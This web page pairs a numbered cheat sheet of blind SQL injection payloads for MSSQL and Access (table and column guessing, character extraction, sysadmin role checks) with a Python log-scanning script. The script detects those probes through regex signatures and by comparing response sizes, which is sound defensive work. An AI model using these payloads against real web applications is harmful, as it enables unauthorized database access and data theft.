1. Check whether the parameter is injectable: ;and 1=1 ;and 1=2
2. Preliminary check whether the backend is MSSQL: ;and user>0
3. When the injected parameter is a string: 'and [condition] and ''='
4. When a search field does not filter its parameter: 'and [condition] and '%25'='
5. Identify the database system:
   ;and (select count(*) from sysobjects)>0 -> mssql
   ;and (select count(*) from msysobjects)>0 -> access
6. Guess the table name: ;and (select Count(*) from [table name])>0
7. Guess the column name: ;and (select Count(column_name) from table_name)>0
8. Guess the length of a record in the column: ;and (select top 1 len(column_name) from table_name)>0
9. (1) Guess the ASCII value of a column's characters (Access):
   ;and (select top 1 asc(mid(column_name,1,1)) from table_name)>0
   (2) Guess the ASCII value of a column's characters (MSSQL):
   ;and (select top 1 unicode(substring(column_name,1,1)) from table_name)>0
10. Test the privilege level (MSSQL):
   ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
   ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
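Every probe on this sheet leaves a distinctive footprint in the web server's access log, so the same list doubles as a detection checklist. The script below is an added example written for this page, not part of the original sheet: it parses a handful of constructed Combined-Log-style lines (no real server, hosts or paths), URL-decodes each query string, tags requests that match the probe families listed above (the 1=1/1=2 pair, user>0, the sysobjects/msysobjects fingerprint, the asc(mid())/unicode(substring()) character extraction, and IS_SRVROLEMEMBER), and then looks for the strongest signal: a 1=1 and a 1=2 request from the same client against the same path that returned different response sizes, which is exactly the boolean oracle item 1 relies on. The log format, field names and signature list are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Combined Log style, no real hosts or sites).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12%20and%201=2 HTTP/1.1" 200 312
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12%20and%20user%3E0 HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)%3E0 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.asp?id=12%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'));-- HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /search.asp?q=band%20and%20tour HTTP/1.1" 200 2048
"""

# One regex per probe family from the sheet; keyed by a short tag used in findings.
SIGNATURES = {
    "boolean-probe":      re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "user-type-error":    re.compile(r"\band\s+user\s*>\s*0\b", re.I),
    "dbms-fingerprint":   re.compile(r"\bfrom\s+m?sysobjects\b", re.I),
    "blind-char-extract": re.compile(r"\b(?:asc\s*\(\s*mid|unicode\s*\(\s*substring)\s*\(", re.I),
    "mssql-role-check":   re.compile(r"\bIS_SRVROLEMEMBER\s*\(", re.I),
}

# Assumed log layout: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)


def parse_line(line):
    """Split one log line into client, path, decoded query string, status and size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    return {
        "ip": m.group("ip"),
        "path": path,
        "query": unquote_plus(query),   # %20 -> space, %3E -> '>', %25 -> '%'
        "status": int(m.group("status")),
        "size": int(m.group("size")),
    }


def classify(query):
    """Return the list of probe-family tags whose signature matches the decoded query."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(text):
    """Return every parsed request that matches at least one signature, with its tags."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec["query"])
        if tags:
            rec["tags"] = tags
            findings.append(rec)
    return findings


def boolean_pairs(findings):
    """Find (client, path) pairs that sent both 'and 1=1' and 'and 1=2' and got
    responses of different sizes: the oracle a blind boolean probe depends on."""
    seen = {}
    for f in findings:
        if "boolean-probe" not in f["tags"]:
            continue
        truth = "true" if re.search(r"\b1\s*=\s*1\b", f["query"]) else "false"
        seen.setdefault((f["ip"], f["path"]), {})[truth] = f["size"]
    return {k: v for k, v in seen.items()
            if "true" in v and "false" in v and v["true"] != v["false"]}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ip"]} {h["path"]} {h["status"]} {h["size"]} {h["tags"]} :: {h["query"]}')
    print("boolean oracle candidates:", boolean_pairs(hits))
```

Signature matching on its own is brittle (alternate encodings, inline comments and case tricks all slip past fixed regexes), so treat the tags as a triage signal and the size differential from `boolean_pairs` as the higher-confidence indicator; the benign `search.asp?q=band and tour` line is there to show that a bare `and` in user text must not trip the rules.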